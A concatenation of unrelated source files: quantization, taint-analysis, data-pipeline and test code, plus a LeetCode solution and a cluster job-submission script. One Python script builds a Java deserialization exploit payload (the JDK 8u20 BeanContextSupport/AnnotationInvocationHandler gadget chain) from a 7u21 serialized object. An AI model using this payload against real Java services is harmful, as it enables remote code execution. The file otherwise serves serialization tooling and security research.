ranking_subset = \
np.array(self._diff_subset_indices)[sorted_sample_importance[from_id:to_id]]
return ranking_subset
def _calculate_node_importance_scores(self, model, ranking_subset, metric_name, excluded_nodes=None):
"""Cuts out FQ layers one after another and measures metric value on ranking subset.
The higher the value, the more important the node.
:param model: graph from which to cut nodes
:param ranking_subset: subset on which the scores will be calculated
:param metric_name: metric to take into account
:return a dictionary of node importance {metric_name: score}
"""
change_fqs = []
node_importance_score = {}
eu.select_evaluation_dataset(self._engine)
fake_quantize_nodes = get_nodes_by_type(model, ['FakeQuantize'])
for node in fake_quantize_nodes:
if excluded_nodes and node.name in excluded_nodes:
continue
if node.name not in change_fqs:
modified_model, modified_fq_layers, _ = self._modify_model_in_scope(deepcopy(model), [node.name])
if not modified_fq_layers:
continue
logger.debug('Changed\\Removed a block of %d FQ layers: %s', len(modified_fq_layers),
modified_fq_layers)
change_fqs += modified_fq_layers
self._engine.set_model(modified_model)
self._engine.allow_pairwise_subset = True
index_sampler = create_sampler(self._engine, samples=list(ranking_subset))
metrics, *_ = self._engine.predict(sampler=index_sampler)
self._engine.allow_pairwise_subset = False
logger.update_progress(self._config.ranking_subset_size)
ranking_metric = self._metrics_config[metric_name].ranking
node_importance_score[node.name] = ranking_metric.comparator(metrics[ranking_metric.name])
eu.reset_dataset_to_default(self._engine)
return node_importance_score
def _modify_model_in_scope(self, model, nodes_names):
return self._graph_transformer.remove_fq_nodes(deepcopy(model), nodes_names)
def compute_total_exec_steps(self, model=None):
total_steps = 0
# add dataset_size to total if baseline not implemented
if not self._baseline_metric or self._config.annotation_free:
total_steps += self._dataset_size
# add dataset_size to total for int8 inference
total_steps += self._dataset_size
# add dataset_size to total in case of conversion to mixed mode
if self._config.convert_to_mixed_preset:
total_steps += self._dataset_size
nodes_length = len(get_nodes_by_type(model, ['Convolution', 'MatMul']))
num_steps = self._config['max_iter_num'] if self._config['max_iter_num'] < maxsize else nodes_length
metric_computing_steps = nodes_length * self._config['ranking_subset_size']
# add ranking_subset_size for num_steps and again computing every 3 steps
total_steps += metric_computing_steps + \
metric_computing_steps * self._config['ranking_subset_size'] * num_steps / 3
# add total run steps (num steps) without one of FQs pairs
total_steps += num_steps * self._dataset_size
# number of statistics computing
total_steps += self._quantization_algo.total_exec_steps
if self._config.convert_to_mixed_preset:
total_steps += self._preset_conversion_algo.total_exec_steps
self.total_exec_steps = total_steps
def _convert_model_to_mixed_preset(self, model):
logger.info('Start quantization in mixed mode')
return self._preset_conversion_algo.run(model)
def _quantize_model(self, model):
logger.info('Start quantization')
return self._quantization_algo.run(model)
def _search_optimal_parameters(self, model):
logger.info('Start parameters grid search')
return self._grid_search_algo.run(model)
def _quantize_and_evaluate(self, model, quantization_algo, print_progress=True):
def calculate_accuracy_drop():
return {metric_name: params.comparator(self._baseline_metric[metric_name]
- quantized_metrics[metric_name])
for metric_name, params in self._metrics_config.items()}
quantized_model = quantization_algo(model)
logger.info('Start compressed model inference')
quantized_metrics, quantized_metrics_per_sample = \
self._evaluate_model(model=quantized_model,
per_sample_subset_indices=self._diff_subset_indices,
print_progress=print_progress)
logger.info('Fully quantized metrics: %s', quantized_metrics)
metrics_accuracy_drop = calculate_accuracy_drop()
logger.info('Accuracy drop: %s', metrics_accuracy_drop)
return quantized_model, metrics_accuracy_drop, quantized_metrics_per_sample
def _drop_restrictions_are_met(self, metrics_accuracy_drop):
return all(metrics_accuracy_drop[name] <= self._max_drop_by_name[name]
for name in self._metrics_config)
def _save_intermediate_model(self, model):
save_model(model,
self._config.intermediate_log_dir,
model_name='intermediate_model')
logger.debug('Intermediate model is saved in %s', self._config.intermediate_log_dir)
def _create_hardest_ranking_subset(self, metrics_per_sample):
worst_ranking_subset = []
while len(worst_ranking_subset) < self._config.ranking_subset_size:
needed_subset_size = self._config.ranking_subset_size - len(worst_ranking_subset)
top_n_samples = int(np.ceil(needed_subset_size / len(metrics_per_sample.keys())))
local_ranking_subset = []
for metric_name in metrics_per_sample:
ranking_subset = self._get_ranking_subset(metrics_per_sample, metric_name, len(worst_ranking_subset))
local_ranking_subset.extend(ranking_subset[:top_n_samples])
worst_ranking_subset.extend(list(set(local_ranking_subset)))
return list(set(worst_ranking_subset))
def _evaluate_model(self, model, per_sample_subset_indices=None,
subset_indices=None, print_progress=True):
metrics, metrics_per_sample = evaluate_model(model, self._engine, self._dataset_size,
subset_indices, print_progress, self._metrics_config,
per_sample_subset_indices, self._output_node_name,
self._stats_layout)
predict_step_size = self._dataset_size if not subset_indices else len(subset_indices)
logger.update_progress(predict_step_size)
return metrics, metrics_per_sample
def _request_alt_statistics(self, model):
pass
def _get_num_of_quantized_ops(self, model):
return get_num_of_quantized_ops(model, self._graph_transformer.fq_removal.quantize_operations)
@staticmethod
def _get_result_aa(metrics_accuracy_drop, num_of_reverted_layers):
try:
return str({'final_drop': dict(metrics_accuracy_drop),
'num_of_reverted_layers': num_of_reverted_layers})
except Exception as e: # pylint: disable=broad-except
logger.info("Error occurred while trying to send telemetry. Details:" + str(e))
return str(None)
@staticmethod
def _create_quantization_algo(algo_config, name, engine):
algo = COMPRESSION_ALGORITHMS.get(algo_config.base_algorithm)(algo_config, engine)
algo.name = name
return algo
|
tests/test8u20/main.py | potats0/javaSerializationTools | 124 | 30356 | import yaml
from javaSerializationTools import JavaString, JavaField, JavaObject, JavaEndBlock
from javaSerializationTools import ObjectRead
from javaSerializationTools import ObjectWrite
if __name__ == '__main__':
with open("../files/7u21.ser", "rb") as f:
a = ObjectRead(f)
obj = a.readContent()
# 第一步,向HashSet添加一个假字段,名字fake
signature = JavaString("Ljava/beans/beancontext/BeanContextSupport;")
fakeSignature = {'name': 'fake', 'signature': signature}
obj.javaClass.superJavaClass.fields.append(fakeSignature)
# 构造假的BeanContextSupport反序列化对象,注意要引用后面的AnnotationInvocationHandler
# 读取BeanContextSupportClass的类的简介
with open('BeanContextSupportClass.yaml', 'r') as f1:
BeanContextSupportClassDesc = yaml.load(f1.read(), Loader=yaml.FullLoader)
# 向beanContextSupportObject添加beanContextChildPeer属性
beanContextSupportObject = JavaObject(BeanContextSupportClassDesc)
beanContextChildPeerField = JavaField('beanContextChildPeer',
JavaString('Ljava/beans/beancontext/BeanContextChild'),
beanContextSupportObject)
beanContextSupportObject.fields.append([beanContextChildPeerField])
# 向beanContextSupportObject添加serializable属性
serializableField = JavaField('serializable', 'I', 1)
beanContextSupportObject.fields.append([serializableField])
# 向beanContextSupportObject添加objectAnnontations 数据
beanContextSupportObject.objectAnnotation.append(JavaEndBlock())
AnnotationInvocationHandler = obj.objectAnnotation[2].fields[0][0].value
beanContextSupportObject.objectAnnotation.append(AnnotationInvocationHandler)
# 把beanContextSupportObject对象添加到fake属性里
fakeField = JavaField('fake', fakeSignature['signature'], beanContextSupportObject)
obj.fields[0].append(fakeField)
with open("8u20.ser", 'wb') as f:
o = ObjectWrite(f)
o.writeContent(obj)
|
tool/taint_analysis/summary_functions.py | cpbscholten/karonte | 294 | 30401 | """
Though karonte relies on angr's sim procedures, sometimes these add in the current state some constraints to make the
used analysis faster. For example, if a malloc has an unconstrained size, angr add the constraint
size == angr-defined.MAX_SIZE. Though this makes the analysis faster, it makes impossible to reason about the maximum
buffer sizes (as needed by karonte).
In this module we wrap sim procedures to avoid them to add such constraints.
Note however, that the semantic of an expression might get lost.
Eg. strlen(taint_x) = taint_y, taint_y is an unconstrained variable
"""
from taint_analysis.coretaint import *
def _get_function_name(addr, p):
"""
Return a function name
:param addr: function address
:param p: angr project
:return: function name
"""
return p.loader.find_plt_stub_name(addr)
def source_dummy(*_, **__):
pass
def memcmp_unsized(_core, _, plt_path):
"""
memcmp-like unsized (e.g., strlen) function summary
:param _core: core taint engine
:param _: not used
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
dst_reg = arg_reg_name(p, 0)
src_reg = arg_reg_name(p, 1)
b1 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, dst_reg))
b2 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, src_reg))
if not _core.is_tainted(b1, plt_path):
b1 = None
if not _core.is_tainted(b2, plt_path):
b2 = None
# if either of the two is not tainted, we untaint the other
if b1 is not None and b2 is None:
_core.do_recursive_untaint(b1, plt_path)
elif b2 is not None and b1 is None:
_core.do_recursive_untaint(b2, plt_path)
# step into it
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "memcmp_unsized: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
def memcmp_sized(_core, _, plt_path):
"""
memcmp-like sized (e.g., memcmp) function summary
:param _core: core taint engine
:param _: not used
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
dst_reg = arg_reg_name(p, 0)
src_reg = arg_reg_name(p, 1)
reg_n = arg_reg_name(p, 2)
b1 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, dst_reg))
b2 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, src_reg))
n = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, reg_n))
# we untaint buffers only if n is not tainted
if not _core.is_tainted(n, plt_path):
if not _core.is_tainted(b1, plt_path):
b1 = None
if not _core.is_tainted(b2, plt_path):
b2 = None
# if either of the two is not tainted, we untaint the other
if b1 is not None and b2 is None:
_core.do_recursive_untaint(b1, plt_path)
elif b2 is not None and b1 is None:
_core.do_recursive_untaint(b2, plt_path)
# step into it
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "memcmp_sized: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
def memcpy_sized(_core, call_site_path, plt_path):
"""
memcpy-like sized (e.g., memcpy) function summary
:param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
# if the second parameter is tainted (or pointing to a tainted location)
# or the third is tainted, we taint the first too
dst_reg = arg_reg_name(p, 0)
dst = getattr(plt_path.active[0].regs, dst_reg)
dst_loaded = _core.safe_load(plt_path, dst)
src_reg = arg_reg_name(p, 1)
src = getattr(plt_path.active[0].regs, src_reg)
src_loaded = _core.safe_load(plt_path, src)
reg_n = arg_reg_name(p, 2)
n = getattr(plt_path.active[0].regs, reg_n)
# n_loaded = _core.safe_load(plt_path_cp, size)
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "memcpy_sized: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
if not plt_path.active:
raise Exception("size of function has no active successors, not walking this path...")
# apply taint to dst if source is tainted and constrain this buffer
# TODO take N into account
if _core.is_tainted(src_loaded, path=plt_path):
src_loaded_full = _core.safe_load(plt_path, src, estimate_size=True)
new_dst_t = _core.get_sym_val(name=_core.taint_buf, bits=src_loaded_full.length).reversed
_core.add_taint_glob_dep(new_dst_t, src_loaded_full, plt_path)
plt_path.active[0].add_constraints(src_loaded_full == new_dst_t)
plt_path.active[0].memory.store(dst, new_dst_t)
# untaint if the size is constrained
if (_core.is_tainted(dst, path=plt_path) or
_core.is_tainted(dst_loaded, path=plt_path)) and \
not _core.is_tainted(n, path=plt_path):
# do untaint
_core.do_recursive_untaint(dst_loaded, plt_path)
def memcpy_unsized(_core, call_site_path, plt_path):
"""
memcpy-like unsize (e.g., strcpy) function summary
:param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
dst_reg = arg_reg_name(p, 0)
dst = getattr(plt_path.active[0].regs, dst_reg)
# dst_loaded = _core.safe_load(plt_path_cp, dst, estimate_size=True)
src_reg = arg_reg_name(p, 1)
src = getattr(plt_path.active[0].regs, src_reg)
src_loaded = _core.safe_load(plt_path, src)
# run the sim procedure
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "memcpy_unsized: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
if not plt_path.active:
raise Exception("size of function has no active successors, not walking this path...")
# apply taint to dst if source is tainted and constrain this buffer
if _core.is_tainted(src_loaded, path=plt_path):
src_loaded_full = _core.safe_load(plt_path, src, estimate_size=True)
new_dst_t = _core.get_sym_val(name=_core.taint_buf, bits=src_loaded_full.length).reversed
_core.add_taint_glob_dep(new_dst_t, src_loaded_full, plt_path)
plt_path.active[0].add_constraints(src_loaded_full == new_dst_t)
plt_path.active[0].memory.store(dst, new_dst_t)
def is_size_taint(v):
return '__size__' in str(v)
def sizeof(_core, call_site_path, plt_path):
"""
sizeof-like (e.g., strlen) function summary
:param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
n = getattr(plt_path.active[0].regs, arg_reg_name(p, 0))
cnt = _core.safe_load(plt_path, n, _core.taint_buf_size/8)
# use the sim procedure to continue to the next state and add constraints
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "sizeof: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
if not plt_path.active:
raise Exception("size of function has no active successors, not walking this path...")
return_value = getattr(plt_path.active[0].regs, ret_reg_name(p))
# TODO: check if the constraints set by angr sim procedure are correct
# if there is a tainted buffer in one of the registers then also taint this variable
if _core.is_tainted(cnt, path=plt_path) or _core.is_tainted(n, path=plt_path):
t = _core.get_sym_val(name=(_core.taint_buf + '__size__'), bits=p.arch.bits).reversed
_core.add_taint_glob_dep(t, cnt, plt_path)
# constrain output of this variable equal to the output of sizeof and add it to the return register
plt_path.active[0].add_constraints(return_value == t)
setattr(plt_path.active[0].regs, ret_reg_name(p), t)
#
# Heap functions
#
def _malloc(_core, _, plt_path):
"""
maclloc function summary
:param _core: core taint engine
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
state = plt_path.active[0]
sim_size = getattr(state.regs, arg_reg_name(p, 0))
# when the size is symbolic, choose the maximum size possible
if state.solver.symbolic(sim_size):
size = state.solver.max(sim_size)
if size > state.libc.max_variable_size:
size = state.libc.max_variable_size
setattr(state.regs, arg_reg_name(p, 0), size)
# use the sim procedure
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "malloc: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
return sim_size
def _realloc(_core, _, plt_path):
"""
realloc function summary
:param _core: core taint engine
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
state = plt_path.active[0]
sim_size = getattr(state.regs, arg_reg_name(p, 1))
# ptr = getattr(state.regs, arg_reg_name(p, 0))
# when the size is symbolic, choose the maximum size possible
if state.solver.symbolic(sim_size):
size = state.solver.max(sim_size)
if size > state.libc.max_variable_size:
size = state.libc.max_variable_size
setattr(state.regs, arg_reg_name(p, 0), size)
# if the size is not tainted, use the sim procedure
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "realloc: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
return sim_size
def heap_alloc(_core, call_site_path, plt_path):
"""
Heap allocation function stub
:param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
fname = _get_function_name(plt_path.active[0].addr, _core.p)
sim_size = None
if fname == 'malloc':
sim_size = _malloc(_core, call_site_path, plt_path)
elif fname == 'realloc':
sim_size = _realloc(_core, call_site_path, plt_path)
else:
print(f"Implement this heap alloc: {fname}")
if sim_size is not None:
taint_args = [l for l in sim_size.recursive_leaf_asts if _core.is_tainted(l, call_site_path)]
if taint_args and len(set(taint_args)) == 1:
arg = taint_args[0]
if is_size_taint(arg):
_core.do_recursive_untaint(arg, plt_path)
#
# Env function
#
env_var = {}
def _setenv(_core, _, plt_path):
"""
setenv function summary
:param _core: core taint engine
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
global env_var
p = _core.p
plt_path_cp = plt_path.copy(deep=True)
plt_state_cp = plt_path_cp.active[0]
# add the environment variable to the list of env_variables with this key
key = getattr(plt_path.active[0].regs, arg_reg_name(p, 0))
env_var[str(key)] = getattr(plt_path.active[0].regs, arg_reg_name(p, 1))
# this call can continue with an empty sim procedure since it does nothing
next_state = plt_state_cp.step()
_core.p.hook(next_state.addr, ReturnUnconstrained())
plt_path.step().step()
def _getenv(_core, call_site_addr, plt_path):
"""
getenv function summary
:param _core: core taint engine
:param call_site_addr: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
global env_var
p = _core.p
env_var_size = _core.taint_buf_size
reg = getattr(plt_path.active[0].regs, arg_reg_name(p, 0))
cnt_mem = _core.safe_load(plt_path, reg)
key = str(reg)
# this info is passed by some user controllable source
if _core.is_tainted(reg, path=plt_path) or _core.is_tainted(cnt_mem, path=plt_path):
to_store = _core.get_sym_val(name=_core.taint_buf, bits=env_var_size)
# it was set before
elif key in env_var:
to_store = env_var[key]
# fresh symbolic var
else:
to_store = _core.get_sym_val(name="env_var", bits=env_var_size)
# store the symbolic buffer at the memory address
addr = plt_path.active[0].heap.allocate(env_var_size)
plt_path.active[0].memory.store(addr, to_store)
# use an empty hook as sim procedure to continue with the program
plt_path_cp = plt_path.copy(deep=True)
plt_state_cp = plt_path_cp.active[0]
next_state = plt_state_cp.step()
_core.p.hook(next_state.addr, ReturnUnconstrained())
plt_path.step().step()
# set the return address to the pointer
setattr(plt_path.active[0].regs, ret_reg_name(p), addr)
def env(_core, call_site_path, plt_path):
"""
Summarize environment functions (getenv, and setenv)
:param _core: core taint engin
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return:
"""
fname = _get_function_name(plt_path.active[0].addr, _core.p)
if fname == 'setenv':
_setenv(_core, call_site_path, plt_path)
elif fname == 'getenv':
_getenv(_core, call_site_path, plt_path)
else:
print(f"Implement this Env function: {fname}")
# return the env_var if tainted to store for bug_finders
#
# Numerical
#
def atoi(_core, _, plt_path):
p = _core.p
state = plt_path.active[0]
val = getattr(state.regs, arg_reg_name(p, 0))
if _core.is_or_points_to_tainted_data(val, plt_path):
addr = plt_path.active[0].memory.load(val, p.arch.bytes)
_core.do_recursive_untaint(addr, plt_path)
plt_path.step().step()
|
kenlm_training/tests/test_minify.py | ruinunca/data_tooling | 435 | 30404 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import json
from pathlib import Path
import pytest
import cc_net
import cc_net.minify as minify
from cc_net import jsonql, process_wet_file
from cc_net.minify import (
HASH_SIZE,
decode_hashes,
encode_hashes,
encode_line_ids,
get_hashes,
)
def test_encode_decode():
sentences = ["Hello world !", "Is everyone happy in here ?"]
hashes = get_hashes(sentences)
assert all([len(h) == HASH_SIZE for h in hashes])
hashes_int = [minify._b2i(h) for h in hashes]
encoded = encode_hashes(hashes)
decoded = decode_hashes(encoded)
assert all([len(d) == HASH_SIZE for d in decoded])
decoded_int = [minify._b2i(d) for d in decoded]
assert hashes_int == decoded_int
assert hashes == decoded
def test_minify():
doc = {
"raw_content": "Hello world !\nIs everyone happy in here ?",
"language": "en",
"perplexity": 120.0,
"line_ids": [0, 4],
}
expected = {"line_ids": "AAAEAA==", "language": "en", "perplexity": 120.0}
minifier = minify.Minifier()
assert expected == minifier(doc)
@pytest.fixture
def http_from_disk(monkeypatch):
def read_sample_file(url: str, n_retry: int = 3) -> bytes:
expected_url = process_wet_file.WET_URL_ROOT + "/crawl-data/sample.warc.wet"
assert expected_url == url
file = Path(__file__).parent / "data" / "sample.warc.txt"
return file.read_bytes()
monkeypatch.setattr(cc_net.jsonql, "request_get_content", read_sample_file)
def test_minify_and_fetch(http_from_disk, tmp_path: Path):
full_quotes = """Don't part with your illusions. When they are gone you may still exist, but you have ceased to live.
Education: that which reveals to the wise, and conceals from the stupid, the vast limits of their knowledge.
Facts are stubborn things, but statistics are more pliable.
Fiction is obliged to stick to possibilities. Truth isn't."""
# We don't need no education.
chosen_quotes = "\n".join(
l for l in full_quotes.splitlines() if "Education" not in l
)
cc_doc = {
"url": "http://sample_english.com",
"date_download": "2019-03-18T00:00:00Z",
"digest": "sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER",
"source_domain": "sample_english.com",
"title": "Famous Mark Twain Quotes",
"raw_content": full_quotes,
"cc_segment": "crawl-data/sample.warc.wet",
"nlines": 4,
"length": 353,
}
ccnet_metadata = {
"language": "en",
"language_score": 0.99,
"perplexity": 151.5,
"bucket": "head",
"raw_content": chosen_quotes,
"nlines": 3,
"length": len(chosen_quotes),
"original_nlines": 4,
"original_length": 353,
"line_ids": [0, 2, 3],
}
ccnet_doc = dict(cc_doc, **ccnet_metadata)
mini = minify.Minifier()(ccnet_doc.copy())
assert mini is not ccnet_doc
important_fields = [
"url",
"digest",
"cc_segment",
"language",
"language_score",
"perplexity",
"bucket",
"line_ids",
]
expected = {k: ccnet_doc[k] for k in important_fields}
expected["line_ids"] = encode_line_ids(expected["line_ids"]) # type: ignore
assert expected == mini
with jsonql.open_write(tmp_path / "sample.json") as o:
print(json.dumps(mini), file=o)
fetcher = minify.MetadataFetcher(tmp_path)
# line_ids is removed when unminifying
ccnet_doc.pop("line_ids")
assert ccnet_doc == fetcher(cc_doc)
def test_fetch(http_from_disk, tmp_path: Path):
mini_docs = [
{
"url": "http://sample_chinese.com",
"digest": "sha1:Y4E6URVYGIAFNVRTPZ5S3J64RTZTP6HJ",
"cc_segment": "crawl-data/sample.warc.wet",
"line_ids": encode_line_ids([2]),
"bucket": "not_that_great",
},
{
"url": "http://sample_english.com",
"digest": "sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER",
"cc_segment": "crawl-data/sample.warc.wet",
"line_ids": encode_line_ids([3]),
"bucket": "top_notch",
},
]
with jsonql.open_write(tmp_path / "sample.json") as o:
for mini in mini_docs:
print(json.dumps(mini), file=o)
fetcher = minify.MetadataFetcher(tmp_path)
cc = process_wet_file.CCSegmentsReader(["crawl-data/sample.warc.wet"])
docs = [d for d in fetcher.map(cc) if d is not None]
assert cc.retrieved_segments == 1
# Note: documents are retrieved as they are ordered in the .warc.wet file
assert [
"Facts are stubborn things, but statistics are more pliable.",
"事實是固執的東西,但統計數字卻比較柔和。",
] == [d["raw_content"] for d in docs]
assert ["top_notch", "not_that_great"] == [d["bucket"] for d in docs]
|
python/091-100/Interleaving String.py | KaiyuWei/leetcode | 150 | 30416 | <reponame>KaiyuWei/leetcode<filename>python/091-100/Interleaving String.py
class Solution:
# @param {string} s1
# @param {string} s2
# @param {string} s3
# @return {boolean}
def isInterleave(self, s1, s2, s3):
m = len(s1)
n = len(s2)
if m+n != len(s3):
return False
table = [([False] * (m+1)) for i in range(n+1)]
table[0][0] = True
for i in range (1, m+1):
if s3[i-1] == s1[i-1] and table[0][i-1] == True:
table[0][i] = True
for i in range (1, n+1):
if s3[i-1] == s2[i-1] and table[i-1][0] == True:
table[i][0] = True
for i in range (1, n+1):
for j in range(1, m+1):
if s3[i+j-1] == s2[i-1] and table[i-1][j] == True:
table[i][j] = True
if s3[i+j-1] == s1[j-1] and table[i][j-1] == True:
table[i][j] = True
return table[n][m] |
scripts/job/memcached_submit.py | Container-Projects/firmament | 287 | 30425 | from base import job_desc_pb2
from base import task_desc_pb2
from base import reference_desc_pb2
from google.protobuf import text_format
import httplib, urllib, re, sys, random
import binascii
import time
import shlex
def add_worker_task(job_name, task, binary, args, worker_id, num_workers, extra_args):
task.uid = 0
task.name = "%s/%d" % (job_name, worker_id)
task.state = task_desc_pb2.TaskDescriptor.CREATED
task.binary = "/usr/bin/python"
task.args.extend(args)
task.args.append(str(worker_id))
task.args.append(str(num_workers))
task.args.append(binary)
task.args.extend(extra_args)
task.inject_task_lib = True
if len(sys.argv) < 4:
print "usage: memcached_submit.py <coordinator hostname> <web UI port> " \
"<task binary> [<args>] [<num workers>] [<job name>]"
sys.exit(1)
hostname = sys.argv[1]
port = int(sys.argv[2])
memcached_exe = sys.argv[3]
if len(sys.argv) > 4:
extra_args = shlex.split(sys.argv[4])
else:
extra_args = []
if len(sys.argv) > 5:
num_workers = int(sys.argv[5])
else:
num_workers = 1
if len(sys.argv) > 6:
job_name = sys.argv[6]
else:
job_name = "memcached_job_at_%d" % (int(time.time()))
basic_args = []
basic_args.append("/home/srguser/firmament-experiments/helpers/napper/napper_memcached.py")
basic_args.append("caelum-301:2181")
basic_args.append(job_name)
job_desc = job_desc_pb2.JobDescriptor()
job_desc.uuid = "" # UUID will be set automatically on submission
job_desc.name = job_name
# set up root task
job_desc.root_task.uid = 0
job_desc.root_task.name = job_name + "/0"
job_desc.root_task.state = task_desc_pb2.TaskDescriptor.CREATED
job_desc.root_task.binary = "/usr/bin/python"
job_desc.root_task.args.extend(basic_args)
job_desc.root_task.args.append("0") # root task is worker ID 0
job_desc.root_task.args.append(str(num_workers))
job_desc.root_task.args.append(memcached_exe)
job_desc.root_task.args.extend(extra_args)
job_desc.root_task.inject_task_lib = True
# add workers
for i in range(1, num_workers):
task = job_desc.root_task.spawned.add()
add_worker_task(job_name, task, memcached_exe, basic_args, i, num_workers, extra_args)
input_id = binascii.unhexlify('feedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeef')
output_id = binascii.unhexlify('db33daba280d8e68eea6e490723b02cedb33daba280d8e68eea6e490723b02ce')
output2_id = binascii.unhexlify('feedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeef')
job_desc.output_ids.append(output_id)
job_desc.output_ids.append(output2_id)
input_desc = job_desc.root_task.dependencies.add()
input_desc.id = input_id
input_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
input_desc.type = reference_desc_pb2.ReferenceDescriptor.CONCRETE
input_desc.non_deterministic = False
input_desc.location = "blob:/tmp/fib_in"
final_output_desc = job_desc.root_task.outputs.add()
final_output_desc.id = output_id
final_output_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
final_output_desc.type = reference_desc_pb2.ReferenceDescriptor.FUTURE
final_output_desc.non_deterministic = True
final_output_desc.location = "blob:/tmp/out1"
final_output2_desc = job_desc.root_task.outputs.add()
final_output2_desc.id = output2_id
final_output2_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
final_output2_desc.type = reference_desc_pb2.ReferenceDescriptor.FUTURE
final_output2_desc.non_deterministic = True
final_output2_desc.location = "blob:/tmp/out2"
#params = urllib.urlencode({'test': text_format.MessageToString(job_desc)})
params = 'jd=%s' % text_format.MessageToString(job_desc)
print "SUBMITTING job with parameters:"
print params
print ""
try:
headers = {"Content-type": "application/x-www-form-urlencoded"}
conn = httplib.HTTPConnection("%s:%s" % (hostname, port))
conn.request("POST", "/job/submit/", params, headers)
response = conn.getresponse()
except Exception as e:
print "ERROR connecting to coordinator: %s" % (e)
sys.exit(1)
data = response.read()
match = re.search(r"([0-9a-f\-]+)", data, re.MULTILINE | re.S | re.I | re.U)
print "----------------------------------------------"
if match and response.status == 200:
job_id = match.group(1)
print "JOB SUBMITTED successfully!\nJOB ID is %s\nStatus page: " \
"http://%s:%d/job/status/?id=%s" % (job_id, hostname, port, job_id)
else:
print "ERROR submitting job -- response was: %s (Code %d)" % (response.reason,
response.status)
print "----------------------------------------------"
conn.close()
|
refinery/bnpy/bnpy-dev/tests/merge/TestMergeHDPTopicModel.py | csa0001/Refinery | 103 | 30478 | '''
Unit tests for MergeMove.py for HDPTopicModels
Verification merging works as expected and produces valid models.
Attributes
------------
self.Data : K=4 simple WordsData object from AbstractBaseTestForHDP
self.hmodel : K=4 simple bnpy model from AbstractBaseTestForHDP
Coverage
-----------
* run_many_merge_moves
* fails to merge away any true comps
* successfully merges away all duplicated comps when chosen randomly
* successfully merges away all duplicated comps when chosen via marglik
* run_merge_move
* fails to merge away any true comps
* successfully merges away all duplicated comps when targeted specifically
* successfully merges away all duplicated comps when chosen randomly
* successfully merges away all duplicated comps when chosen via marglik
success rate > 95%
'''
import numpy as np
import unittest
from AbstractBaseTestForHDP import AbstractBaseTestForHDP
import bnpy
from bnpy.learnalg import MergeMove
from scipy.special import digamma
import copy
class TestMergeHDP(AbstractBaseTestForHDP):
def getSuffStatsPrepForMerge(self, hmodel):
''' With merge flats ENABLED,
run Estep, calc suff stats, then do an Mstep
'''
LP = hmodel.calc_local_params(self.Data)
flagDict = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True)
SS = hmodel.get_global_suff_stats(self.Data, LP, **flagDict)
hmodel.update_global_params(SS)
return LP, SS
######################################################### Test many moves
#########################################################
def test_run_many_merge_moves_trueModel_random(self):
LP, SS = self.getSuffStatsPrepForMerge(self.hmodel)
PRNG = np.random.RandomState(0)
mergeKwArgs = dict(mergename='random')
a, b, c, MTracker = MergeMove.run_many_merge_moves(self.hmodel,
self.Data, SS,
nMergeTrials=100, randstate=PRNG,
**mergeKwArgs)
assert MTracker.nTrial == SS.K * (SS.K-1)/2
assert MTracker.nSuccess == 0
def test_run_many_merge_moves_dupModel_random(self):
self.MakeModelWithDuplicatedComps()
LP, SS = self.getSuffStatsPrepForMerge(self.dupModel)
PRNG = np.random.RandomState(0)
mergeKwArgs = dict(mergename='random')
a, b, c, MTracker = MergeMove.run_many_merge_moves(self.dupModel,
self.Data, SS,
nMergeTrials=100, randstate=PRNG,
**mergeKwArgs)
assert MTracker.nSuccess == 4
assert (0,4) in MTracker.acceptedOrigIDs
assert (1,5) in MTracker.acceptedOrigIDs
assert (2,6) in MTracker.acceptedOrigIDs
assert (3,7) in MTracker.acceptedOrigIDs
def test_run_many_merge_moves_dupModel_marglik(self):
self.MakeModelWithDuplicatedComps()
LP, SS = self.getSuffStatsPrepForMerge(self.dupModel)
PRNG = np.random.RandomState(456)
mergeKwArgs = dict(mergename='marglik')
